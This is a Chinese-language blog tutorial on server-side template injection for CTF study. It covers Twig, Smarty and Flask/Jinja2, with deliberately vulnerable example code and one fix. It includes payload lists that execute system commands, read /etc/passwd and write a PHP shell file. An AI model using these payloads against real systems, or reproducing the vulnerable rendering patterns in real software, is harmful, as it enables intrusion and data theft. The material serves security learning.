



<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="Hexo" href="http://example.com/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="Hexo" href="http://example.com/atom.xml" />
<link rel="alternate" type="application/json" title="Hexo" href="http://example.com/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  

<link rel="canonical" href="http://example.com/2022/12/27/SSTI/">



  <title>
SSTI - web安全 |
Yume Shoka = Hexo</title>
<meta name="generator" content="Hexo 5.4.2"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">SSTI
  </h1>
  
<div class="meta">
  <span class="item" title="Created: 2022-12-27 13:38:45">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">Posted on</span>
    <time itemprop="dateCreated datePublished" datetime="2022-12-27T13:38:45+08:00">2022-12-27</time>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="Toggle navigation bar">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Yume Shoka</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1giclgrvbd6j20zk0m8qv5.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gipew28b65j20zk0m8hdt.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gipevgoki5j20zk0m84qp.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1giclh5u05ej20zk0m87df.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gipesrnqv3j20zk0m8ava.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gipesx5fdwj20zk0m81kx.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">Home</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/web%E5%AE%89%E5%85%A8/" itemprop="item" rel="index" title="In web安全"><span itemprop="name">web安全</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="en">
  <link itemprop="mainEntityOfPage" href="http://example.com/2022/12/27/SSTI/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="John Doe">
    <meta itemprop="description" content=", ">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Hexo">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="ssti"><a class="markdownIt-Anchor" href="#ssti">#</a> SSTI</h1>
<p>SSTI 就是服务器端模板注入（Server-Side Template Injection）</p>
<p>SSTI 是 CTF 的常客，在 PHP，java，python，甚至 go 中都存在 ssti，为了不再做爆零小笨蛋，本文准备结合 ctf+cms 深入了解一下 ssti</p>
<h2 id="模板引擎"><a class="markdownIt-Anchor" href="#模板引擎">#</a> 模板引擎</h2>
<p>模板引擎（这里特指用于 Web 开发的模板引擎）是为了<strong>使用户界面与业务数据（内容）分离而产生的</strong>，它可以生成特定格式的文档，利用模板引擎来生成前端的 html 代码，模板引擎会提供一套生成 html 代码的程序，然后只需要获取用户的数据，然后放到渲染函数里，然后生成模板 + 用户数据的前端 html 页面，然后反馈给浏览器，呈现在用户面前。</p>
<p>通俗点理解：拿到数据，塞到模板里，然后让渲染引擎将赛进去的东西生成 html 的文本，返回给浏览器，这样做的好处展示数据快，大大提升效率。</p>
<p>后端渲染：浏览器会直接接收到经过服务器计算之后的呈现给用户的最终的 HTML 字符串，计算就是服务器后端经过解析服务器端的模板来完成的，后端渲染的好处是对前端浏览器的压力较小，主要任务在服务器端就已经完成。</p>
<p>前端渲染：前端渲染相反，是浏览器从服务器得到信息，可能是 json 等数据包封装的数据，也可能是 html 代码，他都是由浏览器前端来解析渲染成 html 的人们可视化的代码而呈现在用户面前，好处是对于服务器后端压力较小，主要渲染在用户的客户端完成。</p>
<h2 id="ssti-模板注入"><a class="markdownIt-Anchor" href="#ssti-模板注入">#</a> SSTI 模板注入</h2>
<p>当前使用的一些框架，比如 python 的 flask，php 的 tp，java 的 spring 等一般都采用成熟的的 MVC 的模式，用户的输入先进入 Controller 控制器，然后根据请求类型和请求的指令发送给对应 Model 业务模型进行业务逻辑判断，数据库存取，最后把结果返回给 View 视图层，经过模板渲染展示给用户。因此 SSTI 存在于 MVC 模式当中的 View 层。</p>
<p>漏洞成因就是服务端接收了用户的恶意输入以后，未经任何处理就将其作为 Web 应用模板内容的一部分，模板引擎在进行目标编译渲染的过程中，执行了用户插入的可以破坏模板的语句，因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。</p>
<p>凡是使用模板的地方都可能会出现 SSTI 的问题，SSTI 不属于任何一种语言，沙盒绕过也不是，沙盒绕过只是由于模板引擎发现了很大的安全漏洞，然后模板引擎设计出来的一种防护机制，不允许使用没有定义或者声明的模块，这适用于所有的模板引擎。</p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/1344396-20200911174631687-758048107.png" alt="img"></p>
<p>其实 ctf 多做做就会发现最几年的出题趋势</p>
<p>18，19 年 php 和 python ssti，一直到 2022 年的 go ssti</p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/image-20221203100847401.png" alt="image-20221203100847401"></p>
<p>区别模板</p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/image-20221202175327246.png" alt="image-20221202175327246"></p>
<p>攻击 payload 构造</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">毕竟渗透测试，对于所有渗透测试也都是适用的。</span><br><span class="line">先从探测漏洞 --&gt; 证明存在该漏洞 --&gt; 漏洞的进一步利用</span><br></pre></td></tr></table></figure>
<p>模板引擎会自动执行数学运算，所以如果我们输入一个运算，例如</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://111.com/?username=$&#123;7*7&#125;</span><br></pre></td></tr></table></figure>
<p>如果模板引擎最后返回 Hello 49 则说明存在 SSTI 漏洞。</p>
<h2 id="php"><a class="markdownIt-Anchor" href="#php">#</a> PHP</h2>
<h3 id="twig"><a class="markdownIt-Anchor" href="#twig">#</a> twig</h3>
<p>Twig 是来自于 Symfony 的模板引擎，它非常易于安装和使用。它的操作有点像 Mustache 和 liquid。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">　　require_once dirname(__FILE__).&#x27;\twig\lib\Twig\Autoloader.php&#x27;;</span><br><span class="line">　　Twig_Autoloader::register(true);</span><br><span class="line">　　$twig = new Twig_Environment(new Twig_Loader_String());</span><br><span class="line">　　$output = $twig-&gt;render(&quot;Hello &#123;&#123;name&#125;&#125;&quot;, array(&quot;name&quot; =&gt; $_GET[&quot;name&quot;]));  // 将用户输入作为模版变量的值</span><br><span class="line">　　echo $output;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>Twig 使用一个加载器 loader (Twig_Loader_Array) 来定位模板，以及一个环境变量 environment (Twig_Environment) 来存储配置信息。</p>
<p>其中，render () 方法通过其第一个参数载入模板，并通过第二个参数中的变量来渲染模板。</p>
<p>使用 Twig 模版引擎渲染页面，其中模版含有  变量，其模版变量值来自于 GET 请求参数 $_GET [“name”] 。</p>
<p>也许你会认为这里可以进行 XSS，但是由于模版引擎一般都默认对渲染的变量值进行编码和转义，所以并不会造成跨站脚本攻击:</p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/1344396-20200815170919414-672456065.png" alt="img"></p>
<p>但是，如果渲染的模版内容受到用户的控制，情况就不一样了。修改代码为:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">　　require_once dirname(__FILE__).&#x27;/../lib/Twig/Autoloader.php&#x27;;</span><br><span class="line">　　Twig_Autoloader::register(true);</span><br><span class="line">　　$twig=newTwig_Environment(newTwig_Loader_String());</span><br><span class="line">　　$output=$twig-&gt;render(&quot;Hello &#123;$_GET[&#x27;name&#x27;]&#125;&quot;);// 将用户输入作为模版内容的一部分</span><br><span class="line">　　echo $output;?&gt;</span><br></pre></td></tr></table></figure>
<p>上面这段代码在构建模版时，拼接了用户输入作为模板的内容，现在如果再向服务端直接传递 JavaScript 代码，用户输入会原样输出，测试结果显而易见:</p>
<p>如果服务端将用户的输入作为了模板的一部分，那么在页面渲染时也必定会将用户输入的内容进行模版编译和解析最后输出。</p>
<p>在 Twig 模板引擎里，， 除了可以输出传递的变量以外，还能执行一些基本的表达式然后将其结果作为该模板变量的值。</p>
<p>例如这里用户输入 name=20 ，则在服务端拼接的模版内容为:</p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/1344396-20200815171519739-387170199.png" alt="img"></p>
<p>以上使用的 twig 为 2.x 版本，现在官方已经更新到 3.x 版本，根据官方文档新增了 filter 和 map 等内容，补充一些新版本的 payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#x27;/etc/passwd&#x27;|file_excerpt(1,30)&#125;&#125;</span><br><span class="line">&#123;&#123;app.request.files.get(1).__construct(&#x27;/etc/passwd&#x27;,&#x27;&#x27;)&#125;&#125;</span><br><span class="line">&#123;&#123;app.request.files.get(1).openFile.fread(99)&#125;&#125;</span><br><span class="line">&#123;&#123;_self.env.registerUndefinedFilterCallback(&quot;exec&quot;)&#125;&#125;&#123;&#123;_self.env.getFilter(&quot;whoami&quot;)&#125;&#125;</span><br><span class="line">&#123;&#123;_self.env.enableDebug()&#125;&#125;&#123;&#123;_self.env.isDebug()&#125;&#125;</span><br><span class="line">&#123;&#123;[&quot;id&quot;]|map(&quot;system&quot;)|join(&quot;,&quot;)</span><br><span class="line">&#123;&#123;&#123;&quot;&lt;?php phpinfo();&quot;:&quot;/var/www/html/shell.php&quot;&#125;|map(&quot;file_put_contents&quot;)&#125;&#125;</span><br><span class="line">&#123;&#123;[&quot;id&quot;,0]|sort(&quot;system&quot;)|join(&quot;,&quot;)&#125;&#125;</span><br><span class="line">&#123;&#123;[&quot;id&quot;]|filter(&quot;system&quot;)|join(&quot;,&quot;)&#125;&#125;</span><br><span class="line">&#123;&#123;[0,0]|reduce(&quot;system&quot;,&quot;id&quot;)|join(&quot;,&quot;)&#125;&#125;</span><br><span class="line">&#123;&#123;[&#x27;cat /etc/passwd&#x27;]|filter(&#x27;system&#x27;)&#125;&#125;</span><br></pre></td></tr></table></figure>
<h3 id="smarty"><a class="markdownIt-Anchor" href="#smarty">#</a> smarty</h3>
<p>Smarty 是最流行的 PHP 模板语言之一，为不受信任的模板执行提供了安全模式。这会强制执行在 php 安全函数白名单中的函数，因此我们在模板中无法直接调用 php 中直接执行命令的函数 (相当于存在了一个 disable_function)</p>
<p>$smarty 内置变量可用于访问各种环境变量，比如我们使用 self 得到 smarty 这个类以后我们就去找 smarty 给我们的的方法</p>
<p>注入点：</p>
<ul>
<li>XFF</li>
<li>Client IP</li>
</ul>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123;$smarty.version&#125;  #获取smarty的版本号</span><br><span class="line">&#123;php&#125;phpinfo();&#123;/php&#125;  #执行相应的php代码,在Smarty3版本中已经废弃&#123;php&#125;标签，强烈建议不要使用。在Smarty 3.1，&#123;php&#125;仅在SmartyBC中可用。</span><br><span class="line">&lt;script language=&quot;php&quot;&gt;phpinfo();&lt;/script&gt;    #&lt;script language=&quot;php&quot;&gt;phpinfo();&lt;/script&gt; ,只适用于php5,原理是&#123;literal&#125;标签</span><br><span class="line">&#123;self::getStreamVariable(&quot;file:///etc/passwd&quot;)&#125;  #在3.1.30的Smarty版本中官方已经把该静态方法删除</span><br><span class="line">&#123;if phpinfo()&#125;&#123;/if&#125;</span><br></pre></td></tr></table></figure>
<h2 id="python"><a class="markdownIt-Anchor" href="#python">#</a> python</h2>
<h3 id="flaskjinja2"><a class="markdownIt-Anchor" href="#flaskjinja2">#</a> Flask&amp;jinja2</h3>
<p>这里先补充一些 flask 的知识</p>
<p>我们有如下代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">from flask import Flask</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line">@app.route(&quot;/&quot;)</span><br><span class="line">def hello_world():</span><br><span class="line">    return &quot;hello world&quot;</span><br><span class="line"></span><br><span class="line">if __name__ == &#x27;__main__&#x27;:</span><br><span class="line">    app.run()</span><br></pre></td></tr></table></figure>
<p>如果没有 flask 报错就自己去 pip3 install</p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/image-20221203102807012.png" alt="image-20221203102807012"></p>
<p>此时可以在 web 上运行 hello world 了，访问<span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMTo1MDAwLw=="> http://127.0.0.1:5000</span> 便可以看到打印出 Hello World</p>
<h4 id="route"><a class="markdownIt-Anchor" href="#route">#</a> route</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">@app.route(&#x27;/&#x27;)</span><br></pre></td></tr></table></figure>
<p>使用 route（）装饰器告诉 Flask 什么样的 URL 能触发我们的函数</p>
<p>route（）装饰器把一个函数绑定到对应的 URL 上，这句话相当于路由，一个路由跟随一个函数，如</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">@app.route(&#x27;/&#x27;)</span><br><span class="line">def test()&quot;</span><br><span class="line">   return 123</span><br></pre></td></tr></table></figure>
<p>访问 127.0.0.1:5000 / 则会输出 123，我们修改一下规则</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">@app.route(&#x27;/test&#x27;)</span><br><span class="line">def test()&quot;</span><br><span class="line">   return 123</span><br></pre></td></tr></table></figure>
<p>这个时候访问 127.0.0.1:5000/test 会输出 123.</p>
<p>此外还可以设置动态网址，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">@app.route(&quot;/hello/&lt;username&gt;&quot;)</span><br><span class="line">def hello_user(username):</span><br><span class="line">  return &quot;user:%s&quot;%username</span><br></pre></td></tr></table></figure>
<p>根据 url 里的输入，动态辨别身份，此时便可以看到如下页面：</p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/image-20221203103046869.png" alt="image-20221203103046869"></p>
<p>或者可以使用 int 型，转换器有下面几种：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">int    接受整数</span><br><span class="line">float    同 int ，但是接受浮点数</span><br><span class="line">path    和默认的相似，但也接受斜线</span><br><span class="line"></span><br><span class="line">@app.route(&#x27;/post/&lt;int:post_id&gt;&#x27;)</span><br><span class="line">def show_post(post_id):</span><br><span class="line">    # show the post with the given id, the id is an integer</span><br><span class="line">    return &#x27;Post %d&#x27; % post_id</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">app.run(debug=True)</span><br></pre></td></tr></table></figure>
<p>这样我们修改代码的时候直接保存，网页刷新就可以了，如果不加 debug，那么每次修改代码都要运行一次程序，并且把前一个程序关闭。否则会被前一个程序覆盖。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">app.run(host=&#x27;0.0.0.0&#x27;)</span><br></pre></td></tr></table></figure>
<p>这会让操作系统监听所有公网 IP, 此时便可以在公网上看到自己的 web。</p>
<h4 id="模板渲染"><a class="markdownIt-Anchor" href="#模板渲染">#</a> 模板渲染</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">from flask import render_template</span><br><span class="line"></span><br><span class="line">@app.route(&#x27;/hello/&#x27;)</span><br><span class="line">@app.route(&#x27;/hello/&lt;name&gt;&#x27;)</span><br><span class="line">def hello(name=None):</span><br><span class="line">        return render_template(&#x27;hello.html&#x27;, name=name)//我们hello.html模板未创建所以</span><br></pre></td></tr></table></figure>
<p>模板渲染体系，render_template 函数渲染的是 templates 中的模板，所谓模板是我们自己写的 html，里面的参数需要我们根据每个用户需求传入动态变量。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">├── app.py  </span><br><span class="line">├── static  </span><br><span class="line">│   └── style.css  </span><br><span class="line">└── templates  </span><br><span class="line">    └── index.html</span><br></pre></td></tr></table></figure>
<p>我们写一个 index.html 文件写 templates 文件夹中。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">  &lt;head&gt;</span><br><span class="line">    &lt;title&gt;&#123;&#123;title&#125;&#125; - 小猪佩奇&lt;/title&gt;</span><br><span class="line">  &lt;/head&gt;</span><br><span class="line"> &lt;body&gt;</span><br><span class="line">      &lt;h1&gt;Hello, &#123;&#123;user.name&#125;&#125;!&lt;/h1&gt;</span><br><span class="line">  &lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
<p>我们在 app.py 文件里进行渲染。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">@app.route(&#x27;/&#x27;)</span><br><span class="line">@app.route(&#x27;/index&#x27;)#我们访问/或者/index都会跳转</span><br><span class="line">def index():</span><br><span class="line">   user = &#123;&#x27;name&#x27;: &#x27;小猪佩奇&#x27;&#125;#传入一个字典数组</span><br><span class="line">   return render_template(&quot;index.html&quot;,title=&#x27;Home&#x27;,user=user)</span><br></pre></td></tr></table></figure>
<p>这次渲染我们没有使用用户可控，所以是安全的，如果我们交给用户可控并且不过滤参数就有可能造成 SSTI 模板注入漏洞。</p>
<p>渲染的方法有 <code>render_template</code>  和 <code>render_template_string</code>  两种。</p>
<p>render_template () 是用来渲染一个指定的文件的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">return</span> render_template(<span class="string">&#x27;index.html&#x27;</span>)</span><br></pre></td></tr></table></figure>
<p>render_template_string 则是用来渲染一个字符串的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">html = <span class="string">&#x27;&lt;h1&gt;This is index page&lt;/h1&gt;&#x27;</span></span><br><span class="line"><span class="keyword">return</span> render_template_string(html)</span><br></pre></td></tr></table></figure>
<h4 id="flaskjinja2模板注入"><a class="markdownIt-Anchor" href="#flaskjinja2模板注入">#</a> Flask/jinja2 模板注入</h4>
<p>Jinja2 是 Flask 框架的一部分。Jinja2 会把模板参数提供的相应的值替换了 <code>&#123;&#123;…&#125;&#125;</code>  块</p>
<p>Jinja2 使用 <code> &#123;&#123;name&#125;&#125;</code>  结构表示一个变量，它是一种特殊的占位符，告诉模版引擎这个位置的值从渲染模版时使用的数据中获取。</p>
<p>Jinja2 模板同样支持控制语句，像在  <code>&#123;%…%&#125;</code>  块中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;ul&gt;</span><br><span class="line">     &#123;% for comment in comments %&#125;</span><br><span class="line">         &lt;li&gt;&#123;&#123;comment&#125;&#125;&lt;/li&gt;</span><br><span class="line">     &#123;% endfor %&#125;</span><br><span class="line">&lt;/ul&gt;</span><br></pre></td></tr></table></figure>
<p>模板的不安全使用：示例 1</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">from flask import Flask, request</span><br><span class="line">from jinja2 import Template</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line">@app.route(&quot;/&quot;)</span><br><span class="line">def index():</span><br><span class="line">    name = request.args.get(&#x27;name&#x27;, &#x27;guest&#x27;)</span><br><span class="line"></span><br><span class="line">    t = Template(&quot;Hello &quot; + name)</span><br><span class="line">    return t.render()</span><br><span class="line"></span><br><span class="line">if __name__ == &quot;__main__&quot;:</span><br><span class="line">    app.run()</span><br></pre></td></tr></table></figure>
<p>t = Template (“hello” + name) 这行代码表示，将前端输入的 name 拼接到模板，此时 name 的输入没有经过任何检测，尝试使用模板语言测试：</p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/1344396-20200903130738597-1463882629.png" alt="img"></p>
<p>如果使用一个固定好了的模板，在模板渲染之后传入数据，就不存在模板注入，就好像 SQL 注入的预编译一样，修复上面代码如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">from flask import Flask, request</span><br><span class="line">from jinja2 import Template</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line">@app.route(&quot;/&quot;)</span><br><span class="line">def index():</span><br><span class="line">    name = request.args.get(&#x27;name&#x27;, &#x27;guest&#x27;)</span><br><span class="line"></span><br><span class="line">    t = Template(&quot;Hello &#123;&#123;n&#125;&#125;&quot;)</span><br><span class="line">    return t.render(n=name)</span><br><span class="line"></span><br><span class="line">if __name__ == &quot;__main__&quot;:</span><br><span class="line">    app.run()</span><br></pre></td></tr></table></figure>
<p>模板的不安全使用：示例 2</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">from flask import Flask</span><br><span class="line">from flask import render_template</span><br><span class="line">from flask import request</span><br><span class="line">from flask import render_template_string</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">@app.route(&#x27;/test&#x27;,methods=[&#x27;GET&#x27;, &#x27;POST&#x27;])</span><br><span class="line">def test():</span><br><span class="line">    template = &#x27;&#x27;&#x27;</span><br><span class="line">        &lt;div class=&quot;center-content error&quot;&gt;</span><br><span class="line">            &lt;h1&gt;Oops! That page doesn&#x27;t exist.&lt;/h1&gt;</span><br><span class="line">            &lt;h3&gt;%s&lt;/h3&gt;</span><br><span class="line">        &lt;/div&gt; </span><br><span class="line">    &#x27;&#x27;&#x27; %(request.url)</span><br><span class="line"></span><br><span class="line">    return render_template_string(template)</span><br><span class="line"></span><br><span class="line">if __name__ == &#x27;__main__&#x27;:</span><br><span class="line">    app.debug = True</span><br><span class="line">    app.run()</span><br></pre></td></tr></table></figure>
<p>正常代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">@app.route(&#x27;/&#x27;)</span><br><span class="line">@app.route(&#x27;/index&#x27;)#我们访问/或者/index都会跳转</span><br><span class="line">def index():</span><br><span class="line">   return render_template(&quot;index.html&quot;,title=&#x27;Home&#x27;,user=request.args.get(&quot;key&quot;))</span><br></pre></td></tr></table></figure>
